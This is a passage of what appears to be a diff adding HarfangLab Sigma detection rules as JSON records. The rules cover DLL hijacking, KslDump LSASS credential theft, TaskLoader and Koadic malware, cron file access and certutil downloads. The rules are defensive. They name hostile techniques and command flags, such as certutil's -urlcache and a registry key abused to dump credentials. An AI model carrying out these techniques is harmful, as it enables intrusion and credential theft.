"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.600939Z", + "creation_date": "2026-03-23T11:45:34.600943Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.600951Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_winlogon.yml", + "content": "title: DLL Hijacking via winlogon.exe\nid: 2312ad6d-35cc-45d7-83a7-08f4131d32b0\ndescription: |\n Detects potential Windows DLL Hijacking via winlogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - 
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winlogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UXINIT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0", + "rule_name": "DLL Hijacking via winlogon.exe", + "rule_description": "Detects potential Windows DLL Hijacking via winlogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": 
"windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "2319811a-6bed-4f5b-988c-74630cf93daf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T16:07:52.726835Z", + "creation_date": "2026-03-23T11:45:34.623641Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.623645Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/andreisss/KslDump", + "https://attack.mitre.org/techniques/T1003/001/" + ], + "name": "t1003_001_ksldump.yml", + "content": "title: KslDump Technique Detected\nid: 2319811a-6bed-4f5b-988c-74630cf93daf\ndescription: |\n Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\n KslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\n The attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys 
(drivers\\KslD.sys) that Microsoft left on disk.\n KslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\n The only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\n It is recommended to check the process that modified the registry value and the details for suspicious activities.\nreferences:\n - https://github.com/andreisss/KslDump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2026/03/18\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\KslD\\AllowedProcessName'\n\n filter_legit_defender:\n Details:\n - '\\Device\\HarddiskVolume*\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '\\Device\\HarddiskVolume*\\Program Files\\Windows Defender\\MsMpEng.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "2319811a-6bed-4f5b-988c-74630cf93daf", + "rule_name": "KslDump Technique Detected", + "rule_description": "Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\nKslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\nThe attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\nKslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\nThe only gate to the device handle is a process 
name string stored in a registry key (AllowedProcessName).\nIt is recommended to check the process that modified the registry value and the details for suspicious activities.\n", + "rule_creation_date": "2026-03-18", + "rule_modified_date": "2026-03-23", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "233bd602-6fe8-4484-991f-3b45ef546127", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604263Z", + "creation_date": "2026-03-23T11:45:34.604266Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604274Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.file.net/process/sitool.exe.html", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1071_001_sitool_malware.yml", + "content": "title: TaskLoader Malware Execution\nid: 233bd602-6fe8-4484-991f-3b45ef546127\ndescription: |\n Detects the execution of the TaskLoader malware.\n TaskLoader is a malware that usually 
spreads through cracked software and contacts its C2 server for remote command execution.\n It is named TaskLoader as it utilizes scheduled tasks for persistence.\n The Sitool binary has also been associated with different malwares such as njRAT or Sabsik.\n It is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\nreferences:\n - https://www.file.net/process/sitool.exe.html\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/06/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.TaskLoader\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'sihost.exe'\n Image|endswith: '\\sitool.exe'\n\n condition: selection\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "233bd602-6fe8-4484-991f-3b45ef546127", + "rule_name": "TaskLoader Malware Execution", + "rule_description": "Detects the execution of the TaskLoader malware.\nTaskLoader is a malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\nIt is named TaskLoader as it utilizes scheduled tasks for persistence.\nThe Sitool binary has also been associated with different malwares such as njRAT or Sabsik.\nIt is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\n", + "rule_creation_date": "2023-06-16", + "rule_modified_date": "2025-03-07", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control" + ], + "rule_technique_tags": [ + "attack.t1071.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "23401fcc-11a5-4f33-b901-caca2fc67071", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.617355Z", + "creation_date": "2026-03-23T11:45:34.617357Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.617361Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md", + "https://attack.mitre.org/techniques/T1053/003/" + ], + "name": "t1053_003_cron_file_macos.yml", + "content": "title: Crontab-Related Files Read (macOS)\nid: 23401fcc-11a5-4f33-b901-caca2fc67071\ndescription: |\n Detects the access to a cron job files without the use of crontab.\n An attacker could add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - 
attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/bin/cat'\n - '/bin/echo'\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/less'\n - '/usr/bin/more'\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n\n CommandLine|contains:\n # Match /etc/crontab and /etc/cron.daily and so on\n - '/etc/cron'\n # Alternative way to execute cron jobs via periodic\n - '/etc/periodic'\n - '/private/var/at'\n # symlink to /private/var/at\n - '/usr/lib/cron'\n\n exclusion_crontab_parent:\n ParentImage: '/usr/bin/crontab'\n\n # /bin/sh /etc/periodic/daily/199.clean-fax\n # /bin/sh - /etc/periodic/weekly/999.local\n # sh -c /etc/periodic/daily/999.local\n exclusion_periodic_exec:\n CommandLine|startswith:\n - '/bin/sh /etc/periodic'\n - '/bin/sh - /etc/periodic'\n - 'sh -c /etc/periodic'\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "23401fcc-11a5-4f33-b901-caca2fc67071", + "rule_name": "Crontab-Related Files Read (macOS)", + "rule_description": "Detects the access to a cron job files without the use of crontab.\nAn attacker could add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n", + "rule_creation_date": "2022-11-14", + "rule_modified_date": "2025-01-30", + "rule_os": "macos", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1053.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": 
"23739d71-74b5-47ee-81b8-7aa4d21af3bc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.294721Z", + "creation_date": "2026-03-23T11:45:35.294724Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.294729Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1036/004/", + "https://attack.mitre.org/techniques/T1036/005/", + "https://attack.mitre.org/techniques/T1569/" + ], + "name": "t1036_004_systemd_service_manually_started.yml", + "content": "title: System Service Manually Started\nid: 23739d71-74b5-47ee-81b8-7aa4d21af3bc\ndescription: |\n Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\n This might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\n It is recommended to check if the binary is expected to be executed that way.\nreferences:\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 
2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n ParentImage|contains: '?'\n\n filter_forks:\n ParentImage|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n\n filter_systemd:\n - ParentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n - GrandparentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n\n exclusion_ossec:\n ParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_insights_client:\n CommandLine: '/usr/sbin/sshd -T'\n GrandparentCommandLine|startswith:\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n\n exclusion_sshd_basic_args_1:\n Image|endswith: '/sshd'\n CommandLine|contains:\n - ' -t '\n - ' -h '\n - ' -v '\n\n exclusion_sshd_basic_args_2:\n Image|endswith: '/sshd'\n CommandLine|endswith:\n - ' -t'\n - ' -h'\n - ' -v'\n - ' -?'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_s6_supervise:\n ProcessParentImage|endswith:\n - '/s6-supervise'\n - '/s6-svscan '\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_supervisord:\n ProcessParentCommandLine|contains: '/usr/bin/supervisord'\n\n exclusion_init:\n - ProcessParentCommandLine|contains: '/etc/init.d/'\n - 
ProcessGrandparentCommandLine|contains: '/sbin/init splash'\n - ProcessParentImage: '/sbin/init'\n - ProcessGrandparentImage: '/sbin/init'\n - ProcessParentCommandLine: '/sbin/init'\n - ProcessGrandparentCommandLine: '/sbin/init'\n\n exclusion_containerd:\n - ProcessAncestors|contains: '/containerd-shim-runc-v2'\n - ProcessGrandparentImage: '/sbin/docker-init'\n\n exclusion_runsvdir:\n - ProcessParentCommandLine|contains: 'runsvdir'\n - ProcessParentCommandLine|contains: 'runsvdir'\n\n exclusion_cups_snap:\n ProcessParentCommandLine: '/bin/sh /snap/cups/*/scripts/run-cupsd'\n\n exclusion_busybox:\n ProcessParentImage: '/bin/busybox'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc", + "rule_name": "System Service Manually Started", + "rule_description": "Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\nThis might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\nIt is recommended to check if the binary is expected to be executed that way.\n", + "rule_creation_date": "2023-12-15", + "rule_modified_date": "2026-02-11", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1036.004", + "attack.t1036.005", + "attack.t1569" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "23ae76e3-7f36-4f3d-986c-cd449deeb266", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + 
"rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.091265Z", + "creation_date": "2026-03-23T11:45:34.091267Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.091271Z", + "rule_level": "medium", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/offsecginger/koadic", + "https://attack.mitre.org/software/S0250/", + "https://attack.mitre.org/techniques/T1547/" + ], + "name": "t1547_koadic_script_auto_run.yml", + "content": "title: Koadic Auto Run Script Created\nid: 23ae76e3-7f36-4f3d-986c-cd449deeb266\ndescription: |\n Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\n Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n It is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2021/02/11\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1547\n - attack.s0250\n - classification.Windows.Source.Filesystem\n - classification.Windows.Framework.Koadic\n - 
classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\AppData\\Roaming\\\\??????????.hta'\n - '\\ProgramData\\\\??????????.hta'\n\n condition: selection\nlevel: medium\n# level: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "23ae76e3-7f36-4f3d-986c-cd449deeb266", + "rule_name": "Koadic Auto Run Script Created", + "rule_description": "Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\nKoadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nIt is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\n", + "rule_creation_date": "2021-02-11", + "rule_modified_date": "2025-01-30", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1547" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "23c070c2-f80e-42b8-a453-5cda9de44edb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": 
true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098949Z", + "creation_date": "2026-03-23T11:45:34.098951Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098961Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_lockscreencontentserver.yml", + "content": "title: DLL Hijacking via lockscreencontentserver.exe\nid: 23c070c2-f80e-42b8-a453-5cda9de44edb\ndescription: |\n Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - 
classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lockscreencontentserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\dwmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "23c070c2-f80e-42b8-a453-5cda9de44edb", + "rule_name": "DLL Hijacking via lockscreencontentserver.exe", + "rule_description": "Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.073715Z", + "creation_date": "2026-03-23T11:45:34.073717Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.073721Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://attack.mitre.org/techniques/T1105/" + ], + "name": "t1105_certutil_download_usage.yml", + "content": "title: File Downloaded via Certutil\nid: 23c4819b-cfa3-4862-a35c-8735c0ec96a4\ndescription: |\n Detects usage of certutil.exe to download a file from a given URL.\n Adversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\n It is recommended to analyze the parent process and to downloaded file to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/05/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1105\n - attack.s0160\n - classification.Windows.Source.ProcessCreation\n - 
classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_common_1:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_common_2:\n CommandLine|contains:\n - ' -split '\n - ' /split '\n\n selection_common_3:\n CommandLine|contains:\n - ' -f '\n - ' /f '\n\n selection_variant_urlcache:\n CommandLine|contains:\n - ' -urlcache '\n - ' /urlcache '\n\n selection_variant_verifyctl:\n CommandLine|contains:\n - ' -verifyctl '\n - ' /verifyctl '\n\n condition: all of selection_common_* and 1 of selection_variant_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4", + "rule_name": "File Downloaded via Certutil", + "rule_description": "Detects usage of certutil.exe to download a file from a given URL.\nAdversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\nIt is recommended to 